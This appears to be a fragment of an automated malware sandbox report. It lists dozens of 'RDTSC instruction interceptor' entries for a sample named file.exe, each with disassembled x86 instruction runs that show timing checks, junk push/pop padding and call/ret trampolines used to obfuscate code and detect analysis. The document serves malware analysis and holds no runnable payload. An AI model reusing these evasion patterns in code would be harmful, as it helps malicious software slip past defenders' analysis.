Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2AD7 second address: 9A2ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A322F second address: 9A3235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6EF5 second address: 9A6F93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop esi 0x00000013 nop 0x00000014 add ecx, dword ptr [ebp+122D2B4Ch] 0x0000001a push 00000000h 0x0000001c mov esi, dword ptr [ebp+122D2418h] 0x00000022 call 00007FC134D1C049h 0x00000027 push edi 0x00000028 jmp 00007FC134D1C04Ch 0x0000002d pop edi 0x0000002e push eax 0x0000002f jne 00007FC134D1C04Ah 0x00000035 push ebx 0x00000036 push ecx 0x00000037 pop ecx 0x00000038 pop ebx 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d pushad 0x0000003e jmp 00007FC134D1C059h 0x00000043 jmp 00007FC134D1C052h 0x00000048 popad 0x00000049 mov eax, dword ptr [eax] 0x0000004b jmp 00007FC134D1C054h 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FC134D1C04Dh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6F93 second address: 9A6FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6FA5 second address: 9A7003 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC134D1C046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FC134D1C048h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 and dl, 00000019h 0x0000002a push 00000003h 0x0000002c mov dx, bx 0x0000002f push 00000000h 0x00000031 or dx, C9E1h 0x00000036 push 00000003h 0x00000038 mov ecx, dword ptr [ebp+122D186Eh] 0x0000003e push 4603317Fh 0x00000043 je 00007FC134D1C05Eh 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FC134D1C04Ch 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A7003 second address: 9A7074 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC1350240C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 79FCCE81h 0x00000011 jng 00007FC1350240C7h 0x00000017 clc 0x00000018 lea ebx, dword ptr [ebp+12454D94h] 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007FC1350240C8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 jnc 00007FC1350240CCh 0x0000003e mov dword ptr [ebp+122D3793h], edx 0x00000044 xchg eax, ebx 0x00000045 push esi 0x00000046 jmp 00007FC1350240D8h 0x0000004b pop esi 0x0000004c push eax 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 jnc 00007FC1350240C6h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A722E second address: 9A72B4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7DA675F6h 0x0000000f jmp 00007FC134D1C053h 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FC134D1C048h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 mov esi, eax 0x00000035 pop edi 0x00000036 push ebx 0x00000037 mov dword ptr [ebp+122D1830h], edx 0x0000003d pop ecx 0x0000003e push 00000003h 0x00000040 sub dl, 00000027h 0x00000043 call 00007FC134D1C049h 0x00000048 jmp 00007FC134D1C058h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FC134D1C04Eh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A72B4 second address: 9A72CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A72CA second address: 9A72F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C057h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ebx 0x00000010 ja 00007FC134D1C04Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7830 second address: 9C7836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7836 second address: 9C7859 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC134D1C059h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7859 second address: 9C785D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C785D second address: 9C7872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FC134D1C046h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5CA8 second address: 9C5CD3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC1350240D2h 0x00000008 jmp 00007FC1350240CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC1350240D3h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C62DF second address: 9C6300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC134D1C046h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jl 00007FC134D1C07Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC134D1C04Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8E86 second address: 9C8E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB0DC second address: 9CB102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d jns 00007FC134D1C046h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007FC134D1C046h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB772 second address: 9CB781 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC1350240C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1705 second address: 9D170D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D170D second address: 9D171A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC1350240C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D171A second address: 9D1720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1720 second address: 9D175D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC1350240CCh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC1350240CEh 0x00000015 jmp 00007FC1350240D8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D175D second address: 9D1791 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC134D1C046h 0x00000008 jmp 00007FC134D1C04Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007FC134D1C05Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98C039 second address: 98C055 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC1350240CCh 0x00000008 jns 00007FC1350240C8h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0AC0 second address: 9D0AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC134D1C046h 0x0000000a pop eax 0x0000000b je 00007FC134D1C04Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0C22 second address: 9D0C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0C28 second address: 9D0C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC134D1C04Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0C3A second address: 9D0C40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0F68 second address: 9D0F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007FC134D1C046h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0F87 second address: 9D0F8F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0F8F second address: 9D0F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC134D1C04Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D123A second address: 9D123E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D123E second address: 9D128E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FC134D1C057h 0x00000010 jmp 00007FC134D1C04Fh 0x00000015 jmp 00007FC134D1C056h 0x0000001a popad 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D128E second address: 9D1294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1294 second address: 9D1298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1298 second address: 9D12A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jng 00007FC1350240D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1555 second address: 9D1562 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC134D1C046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3231 second address: 9D324B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC1350240CEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D35A3 second address: 9D35A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3691 second address: 9D36B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D36B5 second address: 9D36BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3970 second address: 9D3976 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3A34 second address: 9D3A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3A3A second address: 9D3A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jg 00007FC1350240C6h 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3ECE second address: 9D3ED4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3ED4 second address: 9D3F1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FC1350240C6h 0x00000009 jnc 00007FC1350240C6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], ebx 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FC1350240C8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D1A5Dh] 0x00000035 nop 0x00000036 pushad 0x00000037 je 00007FC1350240CCh 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3F1A second address: 9D3F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC134D1C057h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4239 second address: 9D4262 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FC1350240D8h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e jg 00007FC1350240C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D44A0 second address: 9D44A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4911 second address: 9D4915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4915 second address: 9D4962 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FC134D1C04Ch 0x0000000e push ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 popad 0x00000013 nop 0x00000014 mov dword ptr [ebp+122D1AA5h], esi 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007FC134D1C048h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 push 00000000h 0x00000038 cld 0x00000039 jo 00007FC134D1C046h 0x0000003f xchg eax, ebx 0x00000040 pushad 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4962 second address: 9D4984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC1350240C6h 0x0000000a popad 0x0000000b jmp 00007FC1350240CFh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4984 second address: 9D498A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D67F9 second address: 9D6814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6814 second address: 9D6818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D71C4 second address: 9D71D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240D0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D85B8 second address: 9D85BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D85BF second address: 9D85C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D85C4 second address: 9D85FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FC134D1C056h 0x0000000f jne 00007FC134D1C046h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC134D1C051h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D85FE second address: 9D867E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FC1350240C8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov di, D429h 0x00000029 mov dword ptr [ebp+122D2631h], ebx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FC1350240C8h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b movsx edi, cx 0x0000004e push 00000000h 0x00000050 xor dword ptr [ebp+122D5660h], edx 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 jne 00007FC1350240C8h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB016 second address: 9DB067 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FC134D1C059h 0x0000000d nop 0x0000000e push esi 0x0000000f movzx edi, si 0x00000012 pop edi 0x00000013 push 00000000h 0x00000015 jmp 00007FC134D1C04Eh 0x0000001a pushad 0x0000001b mov ch, E8h 0x0000001d movzx esi, cx 0x00000020 popad 0x00000021 push 00000000h 0x00000023 or esi, dword ptr [ebp+122D1FADh] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jnp 00007FC134D1C048h 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D97C0 second address: 9D97C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E07CA second address: 9E07F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Bh 0x00000007 jmp 00007FC134D1C058h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA338 second address: 9DA341 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E07F1 second address: 9E0817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC134D1C04Fh 0x00000009 jmp 00007FC134D1C053h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DADFC second address: 9DAE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB889 second address: 9DB88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAE01 second address: 9DAE06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DE92A second address: 9DE997 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC134D1C057h 0x00000008 jmp 00007FC134D1C051h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov di, 6DCFh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov ebx, edx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov eax, dword ptr [ebp+122D0561h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FC134D1C048h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D2503h], esi 0x0000004a push FFFFFFFFh 0x0000004c mov bh, dl 0x0000004e nop 0x0000004f push eax 0x00000050 push edx 0x00000051 js 00007FC134D1C048h 0x00000057 push edx 0x00000058 pop edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAE06 second address: 9DAE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2D93 second address: 9E2DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bh, 8Ah 0x0000000b push 00000000h 0x0000000d mov di, bx 0x00000010 mov di, 8868h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FC134D1C048h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 sub edi, dword ptr [ebp+122D28ECh] 0x00000036 xchg eax, esi 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC134D1C053h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2DEB second address: 9E2DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3FCA second address: 9E3FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
